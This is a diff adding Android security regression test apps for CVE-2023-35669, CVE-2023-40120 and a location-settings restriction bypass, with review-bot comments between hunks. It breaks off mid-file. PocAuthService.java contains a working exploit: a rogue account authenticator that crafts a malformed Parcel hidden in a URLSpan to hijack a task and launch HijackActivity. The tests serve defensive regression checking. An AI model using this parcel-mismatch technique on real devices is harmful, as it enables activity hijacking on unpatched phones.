+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private String mPocActivityStatus;
+ public static int sTaskId;
+ public static final int TIMEOUT_MS = 5000;
+
+ @Test
+ public void testCVE_2023_35669() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ runWithShellPermissionIdentity(
+ () -> {
+ // Registering a receiver here to wait for broadcast
+ final Semaphore targetReturn = new Semaphore(0);
+ final Semaphore hijackReturn = new Semaphore(0);
+ final Semaphore pocReturn = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ // Wait for TargetActivity to get launched
+ if (intent.getBooleanExtra(
+ context.getString(R.string.actionTarget),
+ false)) {
+ // Fetch taskId
+ sTaskId =
+ intent.getIntExtra(
+ context.getString(R.string.taskId),
+ -1);
+ if (sTaskId != -1) {
+ targetReturn.release();
+ }
+ }
+
+ // Wait for HijackActivity to get launched
+ if (intent.getBooleanExtra(
+ context.getString(R.string.isVulnerable),
+ false)) {
+ hijackReturn.release();
+ }
+
+ // Wait for PocActivity to get launched
+ mPocActivityStatus =
+ intent.getStringExtra(
+ context.getString(
+ R.string.pocActivityStatus));
+ if (mPocActivityStatus != null) {
+ pocReturn.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter =
+ new IntentFilter(context.getString(R.string.bcastActionTarget));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Start TargetActivity
+ context.startActivity(
+ new Intent(Intent.ACTION_MAIN)
+ .setClassName(
+ context.getString(R.string.pkgTarget),
+ context.getString(R.string.activityTarget))
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assumeTrue(
+ context.getString(R.string.targetFailMsg),
+ targetReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+
+ // Start PocActivity
+ context.startActivity(
+ new Intent(context, PocActivity.class)
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assumeTrue(
+ context.getString(R.string.pocFailedMsg),
+ pocReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ assumeTrue(
+ context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+ mPocActivityStatus.equals(
+ context.getString(R.string.noExceptionMsg)));
+
+ // Wait for account name to appear on display and then click
+ UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ clickObject(context, uiDevice, context.getString(R.string.accountName));
+
+ // Click on 'Remove Account' button
+ clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+ // Click on 'Remove Account' popup to confirm account removal
+ clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+ // On vulnerable device, HijackActivity will be launched and the test fails
+ assertFalse(
+ context.getString(R.string.msgFailure),
+ hijackReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ });
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ public void clickObject(Context context, UiDevice uiDevice, String objectName) {
+ Pattern activityPattern = Pattern.compile(objectName, Pattern.CASE_INSENSITIVE);
+ BySelector removeAccountSelector = By.text(activityPattern);
+ UiObject2 uiObject = uiDevice.wait(Until.findObject(removeAccountSelector), TIMEOUT_MS);
+ assumeNotNull(context.getString(R.string.objectNotFound, objectName), uiObject);
+ uiObject.click();
+ }
+}
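Review bot: `context.registerReceiver(broadcastReceiver, filter)` in `testCVE_2023_35669` has no matching `unregisterReceiver`, so the receiver and the semaphores it captures stay registered after the lambda returns or an assumption fails. Wrapping the steps after registration in `try { … } finally { context.unregisterReceiver(broadcastReceiver); }` closes that. The call also passes no export flag, although `TargetActivity` sends its broadcast from a different package (`android.security.cts.CVE_2023_35669_target`). If this helper app targets an SDK level that requires an explicit flag for non-system broadcasts, `context.registerReceiver(broadcastReceiver, filter, Context.RECEIVER_EXPORTED)` states the intent; the target SDK is not visible in this hunk, so confirm it first.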
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
new file mode 100644
index 0000000..cbc869f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class HijackActivity extends Activity {
+
+ @Override
+ public void onResume() {
+ try {
+ super.onResume();
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.isVulnerable), true));
+ } catch (Exception ignored) {
+ // Ignoring exceptions here
+ }
+ }
+}
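Review bot: The empty `catch (Exception ignored)` in `onResume` hides a failed `sendBroadcast`, and because the device test treats the absence of this broadcast as the patched outcome (`assertFalse` on `hijackReturn.tryAcquire`), such a failure would read as a pass. At minimum record it in the catch block, e.g. `Log.e("CVE_2023_35669", "hijack broadcast failed", e);` (tag chosen here for illustration; needs `android.util.Log`). The intent is also sent with an action only; if the receiver is registered in the same package (that code is outside this hunk), adding `.setPackage(getPackageName())` keeps the result signal from being delivered to other apps.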
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
new file mode 100644
index 0000000..48cec73
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.Account;
+import android.accounts.AccountManager;
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+import android.provider.Settings;
+
+public class PocActivity extends Activity {
+
+ @Override
+ public void onResume() {
+ try {
+ super.onResume();
+
+ // Adding account
+ getSystemService(AccountManager.class)
+ .addAccountExplicitly(
+ new Account(
+ getString(R.string.accountName),
+ getString(R.string.accountType)),
+ getString(R.string.password),
+ new Bundle());
+
+ // Show settings to allow configuration of sync settings
+ startActivity(new Intent(Settings.ACTION_SYNC_SETTINGS));
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(
+ getString(R.string.pocActivityStatus),
+ getString(R.string.noExceptionMsg)));
+ } catch (Exception e) {
+ try {
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.pocActivityStatus), e.getMessage()));
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ }
+ }
+}
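Review bot: `e.getMessage()` in the catch block can be null, so the failure broadcast may carry a null `pocActivityStatus` extra; the device test later calls `mPocActivityStatus.equals(...)`, which would throw instead of reporting the crash message if the receiver stores that value unchecked (the receiver is outside this hunk). Sending `String.valueOf(e)` instead always yields a non-null string and also includes the exception class. The boolean result of `addAccountExplicitly` is dropped as well, so a rejected account still reports `noExceptionMsg`; checking it and broadcasting a failure status would make the later UI lookup failure easier to diagnose.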
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
new file mode 100644
index 0000000..4cdf4e5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
@@ -0,0 +1,177 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.Parcel;
+import android.text.SpannableString;
+import android.text.style.URLSpan;
+
+import java.lang.reflect.Field;
+import java.nio.charset.StandardCharsets;
+
+public class PocAuthService extends Service {
+
+ private Bundle createResultBundle() {
+ try {
+ Bundle result = new Bundle();
+ result.putString(AccountManager.KEY_ACCOUNT_NAME, "testevilaccountname");
+ result.putString(AccountManager.KEY_ACCOUNT_TYPE, "testevilaccount");
+ result.putString(AccountManager.KEY_AUTHTOKEN, "mockAuthToken");
+ return result;
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ return null;
+ }
+
+ public PocAuthService() {}
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new TestAccountAuthenticator(this).getIBinder();
+ }
+
+ class TestAccountAuthenticator extends AbstractAccountAuthenticator {
+
+ public TestAccountAuthenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public Bundle getAccountRemovalAllowed(
+ AccountAuthenticatorResponse response, Account account)
+ throws NetworkErrorException {
+
+ try {
+ LabeledIntent labeledIntent =
+ new LabeledIntent(
+ new Intent(PocAuthService.this, HijackActivity.class),
+ null /* sourcePackage */,
+ 1 /* labelRes */,
+ 0 /* icon */);
+
+ // Creating parcel to setDataPosition
+ Parcel optionPayload = Parcel.obtain();
+ Bundle evilOptions = new Bundle();
+ evilOptions.putInt(getString(R.string.launchTaskId), DeviceTest.sTaskId);
+ evilOptions.writeToParcel(optionPayload, 0 /* flags */);
+ optionPayload.setDataPosition(0 /* position */);
+ int originLen = optionPayload.readInt();
+ optionPayload.setDataPosition(0 /* position */);
+
+ // Parcel data not fully consumed, unread size : 76
+ optionPayload.writeInt(originLen + 76);
+
+ // Creating parcel to create URLSpan
+ Parcel payload = Parcel.obtain();
+ payload.writeString(null /* resultWho */);
+ payload.writeInt(-1 /* requestCode */);
+ payload.writeInt(0 /* flags */);
+ payload.writeTypedObject(null, 0 /* profilerInfo */);
+ payload.writeInt(1 /* value */);
+ payload.appendFrom(optionPayload, 0 /* offset */, optionPayload.dataSize());
+
+ SpannableString spannableString =
+ new SpannableString(getString(R.string.spannableString));
+ spannableString.setSpan(
+ new URLSpan(new String(payload.marshall(), StandardCharsets.UTF_16LE)),
+ 0 /* start */,
+ 0 /* end */,
+ 0 /* flags */);
+
+ // Setting labeledIntent using refelection
+ Field nonLocalizedLabelField =
+ LabeledIntent.class.getDeclaredField(getString(R.string.fieldName));
+ nonLocalizedLabelField.setAccessible(true);
+ nonLocalizedLabelField.set(labeledIntent, spannableString);
+
+ Bundle result = new Bundle();
+ result.putParcelable(AccountManager.KEY_INTENT, labeledIntent);
+ return result;
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle addAccount(
+ AccountAuthenticatorResponse response,
+ String accountType,
+ String authTokenType,
+ String[] requiredFeatures,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(
+ AccountAuthenticatorResponse response, Account account, Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle getAuthToken(
+ AccountAuthenticatorResponse response,
+ Account account,
+ String authTokenType,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return "mockAuthTokenLabel";
+ }
+
+ @Override
+ public Bundle updateCredentials(
+ AccountAuthenticatorResponse response,
+ Account account,
+ String authTokenType,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle hasFeatures(
+ AccountAuthenticatorResponse response, Account account, String[] features)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+ }
+}
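Review bot: `getAccountRemovalAllowed` swallows every exception and returns null, so a setup failure such as `getDeclaredField` throwing is indistinguishable from a patched device, because the test only fails when HijackActivity reports back. Consider reporting the failure the way PocActivity does, by broadcasting the exception text on `bcastActionTarget`, so the device test can turn it into an assumption failure. Both `Parcel.obtain()` results (`optionPayload`, `payload`) are never returned to the pool; call `recycle()` on each in a `finally`. The constant `76` deserves a comment stating how the value was derived, and the comment `// Setting labeledIntent using refelection` has a typo (`reflection`).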
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
new file mode 100644
index 0000000..cd67da5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-40120",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "sts-device-util",
+ "truth",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
new file mode 100644
index 0000000..020a20f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_40120">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_40120" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
new file mode 100644
index 0000000..c0c1ce5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
@@ -0,0 +1,148 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_40120;
+
+import static android.provider.Settings.Global.SHOW_MEDIA_ON_QUICK_SETTINGS;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.media.MediaMetadata;
+import android.media.session.MediaSession;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_40120() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+
+ // Create a MediaSession
+ MediaSession session =
+ new MediaSession(context, "cve_2023_40120_session" /* session name */);
+
+ // Create a MediaMetadata object, pass an empty 'METADATA_KEY_TITLE' and set metadata
+ // for session
+ String artistName = "testArtist";
+ session.setMetadata(
+ new MediaMetadata.Builder()
+ .putString(MediaMetadata.METADATA_KEY_TITLE, "")
+ .putString(MediaMetadata.METADATA_KEY_ARTIST, artistName)
+ .build());
+
+ // Create notificationManager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Create notificationChannel
+ String channelId = "cve_2023_40120_channel_id";
+ notificationManager.createNotificationChannel(
+ new NotificationChannel(
+ channelId,
+ "cve_2023_40120_channel_name" /* notification channel name */,
+ NotificationManager.IMPORTANCE_DEFAULT));
+
+ // Post the Notification and check if any security exception is caught
+ notificationManager.notify(
+ 0 /* notification id */,
+ new Notification.Builder(context)
+ .setChannelId(channelId)
+ .setStyle(
+ new Notification.DecoratedMediaCustomViewStyle()
+ .setMediaSession(session.getSessionToken()))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .build());
+
+ // Check if notification gets posted or not
+ assume().withMessage("Notification was not posted")
+ .that(
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification :
+ activeNotifications) {
+ if (notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }))
+ .isTrue();
+
+ // Launch notification shade
+ UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ assume().withMessage("Unable to launch notification shade")
+ .that(uiDevice.openNotification())
+ .isTrue();
+
+ // Wait for 'qs_media_controls' resource id to appear
+ String systemuiPackage = "com.android.systemui";
+ UiObject2 resIdObj =
+ uiDevice.wait(
+ Until.findObject(By.res(systemuiPackage, SHOW_MEDIA_ON_QUICK_SETTINGS)),
+ 3000);
+
+ // Assumption failure if 'resIdObj' is null
+ assume().withMessage("resource id qs_media_controls not found")
+ .that(resIdObj)
+ .isNotNull();
+
+ // Assumption failure if 'testArtist' text is not present in notification
+ assume().withMessage("testArtist text not found")
+ .that(resIdObj.getContentDescription().contains(artistName))
+ .isTrue();
+
+ // Fail the test if either notification title is not present or notification title text
+ // is null
+ UiObject2 headerTitleObj =
+ resIdObj.getParent().findObject(By.res(systemuiPackage, "header_title"));
+ assertWithMessage("Device is vulnerable to b/274775190 hence foreground services can be"
+ + " started with an empty notification")
+ .that(headerTitleObj == null || headerTitleObj.getText() == null)
+ .isFalse();
+ } catch (Exception e) {
+ assume().that(e).isNull();
+ }
+ }
+}
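Review bot: `testPocCVE_2023_40120` never releases what it creates: the `MediaSession`, the posted notification, the channel and the opened notification shade all outlive the test and can affect whatever runs next on the device. Declare `session`, `notificationManager` and `channelId` before the `try` and add a `finally` with `session.release();`, `notificationManager.cancel(0);` and `notificationManager.deleteNotificationChannel(channelId);`. Separately, `By.res(systemuiPackage, SHOW_MEDIA_ON_QUICK_SETTINGS)` uses a `Settings.Global` key as a view id; it works only because the key's value is the string `qs_media_controls`, so a local constant with that literal would state the intent. The comment `// Post the Notification and check if any security exception is caught` does not match the code, which only posts the notification.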
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
new file mode 100644
index 0000000..5df144f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "TestLocationScanningServicesUsingSlices",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.slice_slice-view",
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
new file mode 100644
index 0000000..689397d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.TestLocationScanningServicesUsingSlices">
+ <application android:testOnly="true">
+ <activity android:name=".PocActivity" />
+ <receiver android:name=".PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data android:name="android.app.device_admin"
+ android:resource="@xml/device_policies" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.TestLocationScanningServicesUsingSlices" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
new file mode 100644
index 0000000..ed5352d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<device-admin>
+ <uses-policies />
+</device-admin>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
new file mode 100644
index 0000000..f936221
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
@@ -0,0 +1,227 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.os.UserManager.DISALLOW_CONFIG_LOCATION;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.PendingIntent;
+import android.app.admin.DevicePolicyManager;
+import android.app.slice.SliceProvider;
+import android.content.ComponentName;
+import android.content.ContentResolver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private final int waitMS = 5_000;
+ private final String mSettingsPackage = "com.android.settings";
+ private final String mScanningTextResId = mSettingsPackage + ":id/switch_text";
+ private final String mScanningWidgetResId = "android:id/switch_widget";
+ private final String mBaseUri = "content://" + mSettingsPackage + ".slices/action/";
+
+ private Context mContext;
+ private ContentResolver mContentResolver;
+ private UiDevice mDevice;
+ private Resources mSettingsResources;
+
+ @Before
+ public void setUp() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mContext = instrumentation.getTargetContext();
+ mContentResolver = mContext.getContentResolver();
+ mDevice = UiDevice.getInstance(instrumentation);
+ mSettingsResources =
+ mContext.getPackageManager().getResourcesForApplication(mSettingsPackage);
+
+ // Set DISALLOW_CONFIG_LOCATION restriction for the current user
+ mContext.getSystemService(DevicePolicyManager.class)
+ .addUserRestriction(
+ new ComponentName(mContext, PocDeviceAdminReceiver.class),
+ DISALLOW_CONFIG_LOCATION);
+ assumeTrue(
+ "Failed to set user restriction DISALLOW_CONFIG_LOCATION",
+ mContext.getSystemService(UserManager.class)
+ .getUserRestrictions()
+ .getBoolean(DISALLOW_CONFIG_LOCATION));
+ Object intent =
+ SliceProvider.createPermissionIntent(
+ mContext,
+ Uri.parse(mBaseUri),
+ "android.security.cts.TestLocationScanningServicesUsingSlices");
+
+ // For Android SC and SC-V2 createPermissionIntent returns an instance of
+ // PendingIntent
+ if (intent instanceof PendingIntent) {
